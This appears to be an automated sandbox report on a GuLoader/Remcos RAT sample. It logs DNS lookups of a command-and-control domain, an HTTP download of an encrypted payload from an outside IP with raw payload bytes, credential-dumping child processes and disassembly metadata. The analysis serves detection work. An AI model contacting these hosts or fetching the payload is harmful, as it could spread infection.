                              Aug 2, 2021 15:01:10.964843035 CEST53583618.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:11.947202921 CEST6349253192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:11.973643064 CEST53634928.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:13.580502987 CEST6083153192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:13.605627060 CEST53608318.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:14.742151022 CEST6010053192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:14.767044067 CEST53601008.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:16.048583031 CEST5319553192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:16.073540926 CEST53531958.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:16.851861954 CEST5014153192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:16.879432917 CEST53501418.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:17.866914988 CEST5302353192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:17.894478083 CEST53530238.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:18.987708092 CEST4956353192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:19.015850067 CEST53495638.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:19.910012007 CEST5135253192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:19.939580917 CEST53513528.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:20.738210917 CEST5934953192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:20.772495031 CEST53593498.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:21.799954891 CEST5708453192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:21.832734108 CEST53570848.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:22.879910946 CEST5882353192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:22.915153027 CEST53588238.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:35.138012886 CEST5756853192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:35.181376934 CEST53575688.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:38.873280048 CEST5054053192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:38.910888910 CEST53505408.8.8.8192.168.2.3
                              Aug 2, 2021 15:01:56.939182997 CEST5436653192.168.2.38.8.8.8
                              Aug 2, 2021 15:01:56.971487045 CEST53543668.8.8.8192.168.2.3
                              Aug 2, 2021 15:02:07.444068909 CEST5303453192.168.2.38.8.8.8
                              Aug 2, 2021 15:02:07.484725952 CEST53530348.8.8.8192.168.2.3
                              Aug 2, 2021 15:02:13.566667080 CEST5776253192.168.2.38.8.8.8
                              Aug 2, 2021 15:02:13.604362965 CEST53577628.8.8.8192.168.2.3
                              Aug 2, 2021 15:03:04.942322969 CEST5543553192.168.2.38.8.8.8
                              Aug 2, 2021 15:03:04.982295036 CEST53554358.8.8.8192.168.2.3
                              Aug 2, 2021 15:03:10.911448002 CEST5071353192.168.2.38.8.8.8
                              Aug 2, 2021 15:03:10.946295977 CEST53507138.8.8.8192.168.2.3
                              Aug 2, 2021 15:03:39.918612003 CEST5613253192.168.2.38.8.8.8
                              Aug 2, 2021 15:03:39.952965975 CEST53561328.8.8.8192.168.2.3
                              Aug 2, 2021 15:03:40.385349989 CEST5898753192.168.2.38.8.8.8
                              Aug 2, 2021 15:03:40.433784962 CEST53589878.8.8.8192.168.2.3
                              Aug 2, 2021 15:04:00.486310959 CEST5657953192.168.2.38.8.8.8
                              Aug 2, 2021 15:04:00.524296045 CEST53565798.8.8.8192.168.2.3
                              Aug 2, 2021 15:04:01.135952950 CEST6063353192.168.2.38.8.8.8
                              Aug 2, 2021 15:04:01.168286085 CEST53606338.8.8.8192.168.2.3
                              Aug 2, 2021 15:04:01.870608091 CEST6129253192.168.2.38.8.8.8
                              Aug 2, 2021 15:04:01.903352976 CEST53612928.8.8.8192.168.2.3
                              Aug 2, 2021 15:04:02.285778999 CEST6361953192.168.2.38.8.8.8
                              Aug 2, 2021 15:04:02.320975065 CEST53636198.8.8.8192.168.2.3
                              Aug 2, 2021 15:04:02.875510931 CEST6493853192.168.2.38.8.8.8
                              Aug 2, 2021 15:04:02.908174992 CEST53649388.8.8.8192.168.2.3
                              Aug 2, 2021 15:04:03.801573038 CEST6194653192.168.2.38.8.8.8
                              Aug 2, 2021 15:04:03.826596022 CEST53619468.8.8.8192.168.2.3
                              Aug 2, 2021 15:04:04.335899115 CEST6491053192.168.2.38.8.8.8
                              Aug 2, 2021 15:04:04.414990902 CEST53649108.8.8.8192.168.2.3
                              Aug 2, 2021 15:04:05.035968065 CEST5212353192.168.2.38.8.8.8
                              Aug 2, 2021 15:04:05.060872078 CEST53521238.8.8.8192.168.2.3
                              Aug 2, 2021 15:04:05.853852034 CEST5613053192.168.2.38.8.8.8
                              Aug 2, 2021 15:04:05.889024019 CEST53561308.8.8.8192.168.2.3
                              Aug 2, 2021 15:04:06.251069069 CEST5633853192.168.2.38.8.8.8
                              Aug 2, 2021 15:04:06.283968925 CEST53563388.8.8.8192.168.2.3
                              Aug 2, 2021 15:05:57.832459927 CEST5942053192.168.2.38.8.8.8
                              Aug 2, 2021 15:05:57.866383076 CEST53594208.8.8.8192.168.2.3
                              Aug 2, 2021 15:05:58.471285105 CEST5878453192.168.2.38.8.8.8
                              Aug 2, 2021 15:05:58.496082067 CEST53587848.8.8.8192.168.2.3
                              Aug 2, 2021 15:06:02.476249933 CEST6397853192.168.2.38.8.8.8
                              Aug 2, 2021 15:06:02.524781942 CEST53639788.8.8.8192.168.2.3
                              Aug 2, 2021 15:06:06.554744959 CEST6293853192.168.2.38.8.8.8
                              Aug 2, 2021 15:06:06.611047983 CEST53629388.8.8.8192.168.2.3
                              Aug 2, 2021 15:06:06.867002010 CEST5570853192.168.2.38.8.8.8
                              Aug 2, 2021 15:06:06.894660950 CEST53557088.8.8.8192.168.2.3
                              Aug 2, 2021 15:08:37.862473965 CEST5680353192.168.2.38.8.8.8
                              Aug 2, 2021 15:08:37.909857988 CEST53568038.8.8.8192.168.2.3
                              Aug 2, 2021 15:09:14.032036066 CEST5714553192.168.2.38.8.8.8
                              Aug 2, 2021 15:09:14.071578026 CEST53571458.8.8.8192.168.2.3

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                              Aug 2, 2021 15:03:10.911448002 CEST192.168.2.38.8.8.80x89afStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                              Aug 2, 2021 15:03:10.946295977 CEST8.8.8.8192.168.2.30x89afNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
                              Aug 2, 2021 15:05:57.866383076 CEST8.8.8.8192.168.2.30x19b6No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)

                              HTTP Request Dependency Graph

                              • 101.99.94.119

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              0192.168.2.349734101.99.94.11980C:\Users\user\Desktop\loKmeabs9V.exe
                              TimestampkBytes transferredDirectionData
                              Aug 2, 2021 15:03:10.036640882 CEST5267OUTGET /WEALTH_PRUuqVZw139.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                              Host: 101.99.94.119
                              Cache-Control: no-cache
                              Aug 2, 2021 15:03:10.090718031 CEST5269INHTTP/1.1 200 OK
                              Date: Mon, 02 Aug 2021 05:03:09 GMT
                              Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
                              Last-Modified: Sun, 01 Aug 2021 22:14:12 GMT
                              ETag: "72840-5c886c5bd2c84"
                              Accept-Ranges: bytes
                              Content-Length: 469056
                              Content-Type: application/octet-stream
                              Data Raw: 02 da 3f 3b 14 7d 1a 6a 97 49 3f 94 5c 82 37 c8 0c ca ec 44 1c 6d c0 32 59 f9 cf d2 b0 1a e7 13 99 e0 d4 67 ec d8 64 6e 95 58 ec b1 4f 94 7f 92 37 39 35 25 0e 6c f3 89 78 b7 14 89 1a b4 26 f2 11 bc 3c b1 1c 0b fb d6 41 4d 17 b6 90 e4 e1 56 be d4 42 8e 30 56 42 72 02 40 cf 5a 21 29 62 b6 a4 bb 97 62 c7 e2 1d 15 12 0a 25 a3 bb 05 00 9a 03 47 1d ba da 59 7d 50 7d 8e 32 9f bd 1b 63 b0 ea 7e de 40 f0 aa 58 0e 19 69 40 f1 d1 6b f1 62 d6 9c 56 99 d3 55 3a 4c c8 f3 2a 1b 7f 98 48 43 5b 6b 10 cc 6e ca 2c 4f d1 bc 05 59 7c a8 bd 1b e3 26 7b 5f 90 54 72 2d 60 23 c9 eb 7e 5d ec e2 0a 13 8d ba 86 2d 25 4e 20 56 e0 c4 56 b4 da 8c f9 40 35 ce ca 47 61 c1 d5 42 39 36 83 4b 05 13 8e 82 3a 7f 1a 70 78 d3 98 05 7d 70 85 8a 7a b4 55 f9 32 c4 64 02 aa 76 81 23 0d 67 b4 0c 86 01 3c 66 fe 8e 3d 81 d4 a9 fd 53 2d 87 b2 0a 8c 47 cb 99 07 35 0a ea 05 95 85 9a ea 9e 1c b4 42 7b 37 c3 bf 5b d5 08 31 4c 06 8c ae 2a dc 74 43 76 6b 1a 79 74 62 a4 ec 7a e4 b3 33 61 bb 8c f9 8d 24 71 d9 a7 31 0b f7 dd 8d a2 30 60 0f 5d 6b ca 63 ff f3 ad e7 ae 9c 70 5d ab fb cf ab d5 2a 9c 0b c8 8a 06 7a 9e 24 c7 88 e1 fc 5f 55 5d a2 fe e4 58 1e af 6c 38 09 9d 79 ed 0d 1e d1 9b 13 ef bb dd e2 65 05 71 fa 7e 26 bb f5 c9 72 29 42 3c 09 d8 c6 58 89 d2 04 93 17 fc f9 4a ff 0c 29 bd d9 81 ba cb e4 1b 2c 52 78 a4 d9 42 8a 61 95 7c 3e 9a 70 61 f5 c7 73 cf af 4a 80 27 ac 59 a8 a5 a9 49 8b 4d 5f 3c 72 be c5 73 21 12 da 76 7f ba 44 c5 a7 66 6a 8f 02 0d 2c 51 87 6a c1 50 3a 55 43 c6 41 a6 d1 bb 6d db 6f 22 5f 49 7b bc 5d 82 66 82 4b a4 3c d9 82 27 47 0b f0 a6 2a 48 ec 52 1e 40 e4 cc 10 e5 b4 02 68 d3 1c 3b 3c 99 33 d9 13 b9 61 55 a3 8e da ce 48 88 c3 28 d8 13 34 45 1f df b3 20 66 a5 15 3a 2d 26 dc 96 c9 67 30 5c ca 63 b9 34 86 eb 7a fc ff c3 26 06 89 06 ca a1 12 4b 9d f9 57 a7 54 49 70 0a 52 77 83 b6 e9 02 f2 6c 48 f9 74 79 d9 82 16 96 89 9a 7a de b4 90 0f f6 16 6b 07 64 5c 83 16 8f 9d 35 d2 84 8c 59 91 d3 47 b1 2a 4d ad cd 41 07 a6 d3 a3 71 13 43 48 13 55 d1 61 c8 b4 e9 72 ef e4 25 55 23 a3 6c b7 1b 62 c3 ff ed f0 85 26 dc 67 ec 9d b6 82 25 ee ff a9 0b a1 9b 2b e2 53 8e cb 80 d9 08 0e 43 7f ab aa ac e8 48 0c 86 43 08 9d 39 48 04 fc 5a fd cb ff 7f d7 7e 5f cc dd e7 46 9c 10 4c 3d 16 86 e7 3c 91 40 12 5f 01 8e 41 14 23 b5 7b 43 89 4d 4f ad 4f fe 82 56 43 16 6f 60 ec 0e cc 2b 5a f9 2b db 17 89 0a 97 3c 4b 96 7c a4 e1 58 26 05 bd dd b6 55 ab 82 d1 2f 30 a1 29 7c 1d ca aa 24 22 59 fb a1 c2 6e 18 e5 67 5a 05 bf 70 24 a9 54 96 11 ce 4f 01 7c ab 96 38 b4 35 55 08 59 ea ed 23 06 cb 67 22 ff ab ea ab ed 73 ef 40 4f 10 61 66 d5 f0 91 4b 0c 68 4b 13 1b 27 3c 7c 9e cf 12 c2 37 76 5d 5f bc c1 76 8d 4a 87 b9 10 33 69 85 2b e7 99 38 4a d2 a4 a6 09 55 d3 c9 70 5e d8 c0 6d ff 3c fb 56 07 b6 e7 fb 66 8f fb f9 d7 f4 a8 fb 01 0b fa 5c db d2 33 8e 37 1f 9e 99 c1 15 13 ea e1 cd e4 0c 5c e6 ac b1 1f 0b fb d6 45 4d 17 b6 6f 1b e1 56 06 d4 42 8e 30 56 42 72 42 40 cf 5a 21 29 62 b6 a4 bb 97 62 c7 e2 1d 15 12 0a 25 a3 bb 05 00 9a 03 47 1d ba da 59 7d 50 7d 8e 32 9f ad 1a 63 b0 e4 61 64 4e f0 1e 51 c3 38 d1 41 bd 1c 4a a5 0a bf ef 76 e9 a1 3a 5d 3e a9 9e 0a 78 1e f6 26 2c 2f 4b 72 a9 4e b8 59 21 f1 d5 6b 79 38
                              Data Ascii: ?;}jI?\7Dm2YgdnXO795%lx&<AMVB0VBr@Z!)bb%GY}P}2c~@Xi@kbVU:L*HC[kn,OY|&{_Tr-`#~]-%N VV@5GaB96K:px}pzU2dv#g<f=S-G5B{7[1L*tCvkytbz3a$q10`]kcp]*z$_U]Xl8yeq~&r)B<XJ),RxBa|>pasJ'YIM_<rs!vDfj,QjP:UCAmo"_I{]fK<'G*HR@h;<3aUH(4E f:-&g0\c4z&KWTIpRwlHtyzkd\5YG*MAqCHUar%U#lb&g%+SCHC9HZ~_FL=<@_A#{CMOOVCo`+Z+<K|X&U/0)|$"YngZp$TO|85UY#g"s@OafKhK'<|7v]_vJ3i+8JUp^m<Vf\37\EMoVB0VBrB@Z!)bb%GY}P}2cadNQ8AJv:]>x&,/KrNY!ky8
                              Aug 2, 2021 15:03:10.090797901 CEST5270INData Raw: e7 ee 3b 8e 49 1f 3a be 59 7f 27 44 23 c9 eb 7e 5d ec e2 a0 90 cf 8a 68 cf 09 2d ce b4 cc a7 b8 56 f6 ef a3 3e e8 ad 36 a5 4d a2 8f 3c e6 55 cc a9 29 70 d4 fc e4 1c ea 92 54 b0 7f 9f d5 aa 8a a8 10 d7 cd d8 d6 a7 88 88 f1 32 11 9f ca dc a4 ec aa
                              Data Ascii: ;I:Y'D#~]h-V>6M<U)pT2;*c/,c8$\TQO~N!2}/BUXM$LtPi097ks{COpR_Y'EGWuYgCiJUSeYc)BeYB`Jd
                              Aug 2, 2021 15:03:10.090838909 CEST5271INData Raw: e1 64 8e 39 e6 62 9a 10 ef 6a ad 25 5c 83 a5 d3 cb ed 3f 06 48 8b a9 0e 63 d6 e8 2a be 23 28 e9 99 ef 6f a0 7b d7 ae 0f 73 21 a5 4e e4 33 43 88 ff 76 d2 da c7 ce 56 7e a9 d3 31 f2 50 80 48 44 d5 db cb 16 f4 47 21 e9 f8 4b cc d6 bc 7d 91 c6 7d 0c
                              Data Ascii: d9bj%\?Hc*#(o{s!N3CvV~1PHDG!K}}/rl]L,EDoWqn.54nReq0Q)/Muly+)M/4F.oUEM)g4 FZ)$3:t'(WTr}\n
                              Aug 2, 2021 15:03:10.090874910 CEST5273INData Raw: f7 e4 8f c3 f3 55 f8 ec 29 fb d9 f8 38 5a ea 7a 8c 4d 80 60 56 2e f6 b3 10 d7 da ce c5 2c 43 08 fb 3a 54 9f a1 e9 50 50 66 d8 af da 5c 10 62 a8 5d 6f 8d 4a ed 00 51 e8 a0 a7 c0 1b 35 12 d5 20 a2 3a 3b 90 7d fb ed 57 04 79 c5 b4 72 50 54 ea 1d 8e
                              Data Ascii: U)8ZzM`V.,C:TPPf\b]oJQ5 :;}WyrPT~;Is5kT4OUnXa14Rf1.G&O*]WRh)$sr3; 3PAH*JvI6.B!u{~^67P_$I#]*t8HW#
                              Aug 2, 2021 15:03:10.142365932 CEST5274INData Raw: be 7b 98 00 ef 8d 61 c7 4d f6 7f d8 c2 c3 0a 49 79 2e e2 53 0b 00 68 2c 84 08 43 2f 20 65 44 05 4a 0c 86 13 e0 2b 28 08 04 a5 c3 57 7f e7 2b 81 f3 1a c4 5f 2c 16 74 84 af 3b 16 0d 15 b7 5a cd cb a5 51 66 85 17 23 b5 84 75 02 82 b0 9d a7 19 93 56
                              Data Ascii: {aMIy.Sh,C/ eDJ+(W+_,t;ZQf#uVfj:ZpFK?KcU )|7d`nnOTi(ev1U#S@zkr*a/It?nYK{T3Aq0Ne\?#:tsp^c
                              Aug 2, 2021 15:03:10.142405033 CEST5275INData Raw: 9d 9c d2 3f 31 18 9c 07 49 ec e3 8e e6 f5 26 e0 74 d3 76 44 be 12 f5 d6 09 e0 b0 2f 62 ee 57 6e 43 c5 b1 72 42 67 ea 1d d0 0f 3c f6 87 f4 96 60 15 12 a6 bf 50 88 46 c0 47 3d 3f 0d cb 5d 6e 3d b1 27 71 d9 2c 31 c8 a2 56 61 f4 bb 91 e7 86 96 35 cc
                              Data Ascii: ?1I&tvD/bWnCrBg<`PFG=?]n='q,1Va51&g%e=1ae*Bk<IAmd8,HFdWT~1%XY{MtRp1aw{??w|q'@Tt^s!BQ^~g,Q'K.AA-3&_P}
                              Aug 2, 2021 15:03:10.142424107 CEST5277INData Raw: f9 9a d3 34 e6 04 5c b1 64 0a a6 bf ae e2 ee 53 c4 2f b6 96 2f 1a 8f 66 a4 f9 71 be 9f ec 4a 4b 15 61 8c 4c ad 4f 55 b3 d6 fe 34 08 72 9a e9 41 3b 29 d3 a2 14 ff 56 02 6e c3 c0 5d f7 a4 da 36 2f 47 7b 8d dc 54 43 e5 2b d0 cf 4a 25 f9 ab bf a0 32
                              Data Ascii: 4\dS//fqJKaLOU4rA;)Vn]6/G{TC+J%2`n`N*z]&!RZm?^@jrUEjHq6Ki~vk:-?h=j(:^x0vp?PT:b]HoTNE.c0
                              Aug 2, 2021 15:03:10.142442942 CEST5278INData Raw: f1 7d 95 a1 a5 63 90 ea 78 a6 3d 16 65 19 32 1b b6 16 05 82 b9 3f 2a 9b d8 99 6f 54 ce f4 7c 15 65 f5 30 60 0f 6e b9 88 08 78 7e e5 54 a0 dd ba 9b 39 70 4b f6 16 7f 17 e7 a2 88 f9 ef 92 d9 b3 8b 08 ef b7 aa b8 24 3a e8 0f de a7 6c 6d 82 71 7f 1b
                              Data Ascii: }cx=e2?*oT|e0`nx~T9pK$:lmqktfS~r{iB</~ttT3RxawUsw:-o#I"r&Q;wpfFPhFn2!YRa&_P7ub.V3w,nub^rE
                              Aug 2, 2021 15:03:10.142462015 CEST5279INData Raw: 6b d2 e7 f9 7a e1 79 75 07 0b 2d db 42 02 16 c2 6a 1c 19 8d 4c 39 28 df fa 36 a0 be de b3 b9 0e 58 11 2a e7 94 63 3e 55 9b 35 13 fc c5 cb 6f 4f 6e d1 f9 9d 4a 8f db 2a 94 e2 55 9d c4 cf 36 52 63 c7 4b 6a 0b 53 04 28 e9 23 53 40 8b 33 a9 26 ef 91
                              Data Ascii: kzyu-BjL9(6X*c>U5oOnJ*U6RcKjS(#S@3&az`d/l=q7v]1QT8{j0LXd.?vjrgmvL&3ZLXkM>I?^B0Z!/^H`uRY ugAG{
                              Aug 2, 2021 15:03:10.142479897 CEST5281INData Raw: 45 0c 26 f6 bb 10 bb 99 bd f7 59 7a 5e 2a 17 db e3 5d 3d 50 91 a0 62 83 e0 f2 74 10 4f 8c 39 6d 17 08 94 b3 4b 2a cd 9e d4 e7 a6 38 74 ec ec fe e5 6c ab 06 b6 ea 96 8d 42 0a 36 71 6e 4a 3f cf 88 2f 3b 54 2d fb 10 d6 f0 73 0f f3 87 29 96 1e 12 7e
                              Data Ascii: E&Yz^*]=PbtO9mK*8tlB6qnJ?/;T-s)~B\9n'0+mV<W:"WI_piY"9b<U}eD\^2'<?7Gf3R=Dq~y471Zg=F5FA`7+vAou
                              Aug 2, 2021 15:03:10.142499924 CEST5282INData Raw: 49 3f 03 1d f1 86 d0 01 e0 ee 06 78 20 cc c1 8c 69 a2 27 53 00 de ad ad e0 c7 0b 06 83 97 02 42 c7 f9 34 64 27 eb 20 64 d5 77 b2 67 d0 d3 13 a6 be 05 af 49 b4 a3 ec 8f 1f aa e9 c3 09 68 21 9d 26 c8 89 5e 98 37 0f 75 c8 46 d7 51 d2 d7 96 38 28 20
                              Data Ascii: I?x i'SB4d' dwgIh!&^7uFQ8( K?t<I5\0MgA>.F*_HN)qTjqfAD"lnLs8ZBlKtnqmg=.^@unAn|V;-z


                              Code Manipulations

                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              Analysis Process: loKmeabs9V.exe PID: 1536 Parent PID: 5592

                              General

                              Start time:15:01:09
                              Start date:02/08/2021
                              Path:C:\Users\user\Desktop\loKmeabs9V.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Users\user\Desktop\loKmeabs9V.exe'
                              Imagebase:0x400000
                              File size:114688 bytes
                              MD5 hash:E0D74762F123EB6603898D1482EB9752
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Visual Basic
                              Yara matches:
                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Author: Joe Security
                              Reputation:low

                              Chronological Activities

                              Analysis Process: loKmeabs9V.exe PID: 476 Parent PID: 1536

                              General

                              Start time:15:02:09
                              Start date:02/08/2021
                              Path:C:\Users\user\Desktop\loKmeabs9V.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Users\user\Desktop\loKmeabs9V.exe'
                              Imagebase:0x400000
                              File size:114688 bytes
                              MD5 hash:E0D74762F123EB6603898D1482EB9752
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.1286073742.0000000000757000.00000004.00000020.sdmp, Author: Joe Security
                              Reputation:low

                              Chronological Activities

                              Analysis Process: loKmeabs9V.exe PID: 3576 Parent PID: 476

                              General

                              Start time:15:03:11
                              Start date:02/08/2021
                              Path:C:\Users\user\Desktop\loKmeabs9V.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\syqduvyml'
                              Imagebase:0x400000
                              File size:114688 bytes
                              MD5 hash:E0D74762F123EB6603898D1482EB9752
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low

                              Chronological Activities

                              Analysis Process: loKmeabs9V.exe PID: 484 Parent PID: 476

                              General

                              Start time:15:03:12
                              Start date:02/08/2021
                              Path:C:\Users\user\Desktop\loKmeabs9V.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\cawvvojfhdxf'
                              Imagebase:0x400000
                              File size:114688 bytes
                              MD5 hash:E0D74762F123EB6603898D1482EB9752
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low

                              Chronological Activities

                              Analysis Process: loKmeabs9V.exe PID: 4112 Parent PID: 476

                              General

                              Start time:15:03:13
                              Start date:02/08/2021
                              Path:C:\Users\user\Desktop\loKmeabs9V.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\fubgoguhvlpsyny'
                              Imagebase:0x400000
                              File size:114688 bytes
                              MD5 hash:E0D74762F123EB6603898D1482EB9752
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low

                              Chronological Activities

                              Disassembly

                              Code Analysis

                              Reset < >

                                Analysis Process: loKmeabs9V.exe PID: 1536 Parent PID: 5592 loKmeabs9V.exeCOMMON

                                Executed Functions

                                Function 022B9653, Relevance: 15.0, APIs: 2, Strings: 6, Instructions: 974processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateProcessInternalW.KERNELBASE ref: 022B9A0E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: CreateInternalProcess
                                • String ID: ;e=w$D5cI$Z[h]$\T$h%U$z22[
                                • API String ID: 2186235152-530423058
                                • Opcode ID: e090c0f73e55ad957473eea371ca271352b7cae8df276878fdaf6c5db397bb54
                                • Instruction ID: debe218d578031b5cc3245c800f20f4fbb1b601c26ce3a91dda9d57ba23cc0d0
                                • Opcode Fuzzy Hash: e090c0f73e55ad957473eea371ca271352b7cae8df276878fdaf6c5db397bb54
                                • Instruction Fuzzy Hash: C68261726113898FDB758F78CC947CA7BA2EF59340F95821ADD498B319D3709A81CF82
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B962D, Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 239processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateProcessInternalW.KERNELBASE ref: 022B9A0E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: CreateInternalProcess
                                • String ID: ;e=w$D5cI$Z[h]$\T$z22[
                                • API String ID: 2186235152-2234792939
                                • Opcode ID: c44d1cc4750c5ca65015e0e99e1a5963d21243403ac7421022aff7fe2b344e71
                                • Instruction ID: cd3d85b76469f8e5269181b01967412a72064cde54a7c2895746ec9730db8b44
                                • Opcode Fuzzy Hash: c44d1cc4750c5ca65015e0e99e1a5963d21243403ac7421022aff7fe2b344e71
                                • Instruction Fuzzy Hash: 46A1E1716103898FDF3ADFB9C9A47D93BA2BF89350F95402ADD498B258C7305A81CF16
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B7C19, Relevance: 11.2, APIs: 1, Strings: 5, Instructions: 731COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: @USf$D5cI$Z[h]$`$h%U
                                • API String ID: 0-3812957336
                                • Opcode ID: 75b9b416bb256cf9bab1f4feb94e3cdfeffb0282cbeaab90d9f63f4c7e162c18
                                • Instruction ID: 0064d69a5188d77a552794fb0a6fc45d5c67e510fdc4c30ec284a4cd141617f7
                                • Opcode Fuzzy Hash: 75b9b416bb256cf9bab1f4feb94e3cdfeffb0282cbeaab90d9f63f4c7e162c18
                                • Instruction Fuzzy Hash: 25622F726103899FDB758F78CD847DABBB2BF94350F55821ADC899B224C3709A81CF42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B87E3, Relevance: 9.9, APIs: 1, Strings: 4, Instructions: 1177COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: LibraryLoadMemoryProtectVirtual
                                • String ID: D5cI$Z[h]$h%U$wsc
                                • API String ID: 3389902171-2987000970
                                • Opcode ID: 021844952e16a6c7fc2fd5b4abd69fec55a5cd0d9ce157d598d37693f2762dae
                                • Instruction ID: 1070509ce4a81e0a187cc3a2c46926334d235ea7570cd03d49fb44cbf16e57b8
                                • Opcode Fuzzy Hash: 021844952e16a6c7fc2fd5b4abd69fec55a5cd0d9ce157d598d37693f2762dae
                                • Instruction Fuzzy Hash: 9BB244716043898FDB72CF78CC987DABBA2AF56350F45825ADC899F299D3708641CF12
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B629C, Relevance: 9.6, APIs: 2, Strings: 3, Instructions: 897COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: D5cI$Z[h]$h%U
                                • API String ID: 1029625771-4128129217
                                • Opcode ID: f0956c9e9fe822d00840a7cedb6c36c6c54b04dcee3b942f008d2b74841cbe08
                                • Instruction ID: 9f04690b878a96c8926bde871af147c38a011d1eab4f65240521df7d8795000d
                                • Opcode Fuzzy Hash: f0956c9e9fe822d00840a7cedb6c36c6c54b04dcee3b942f008d2b74841cbe08
                                • Instruction Fuzzy Hash: 48821FB26103899FDB759F78CC847DABBB2BF98350F51812ADC899B214D3709A81CF41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B4230, Relevance: 7.8, APIs: 1, Strings: 3, Instructions: 787COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: D5cI$Z[h]$h%U
                                • API String ID: 0-4128129217
                                • Opcode ID: 9646fd4293ab5d114ebd3a490bf655af670384d0823846a5b446feb1553d7147
                                • Instruction ID: d9f19b55e10ba2582f3dc4404b7c83508daa5acfced6c3b1650956e6e7450df9
                                • Opcode Fuzzy Hash: 9646fd4293ab5d114ebd3a490bf655af670384d0823846a5b446feb1553d7147
                                • Instruction Fuzzy Hash: CD6251726153899FDB718F68CC80BCA7BA2FF55340F95821ADD489B319D3B09A81CF81
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022B41B6, Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 679COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
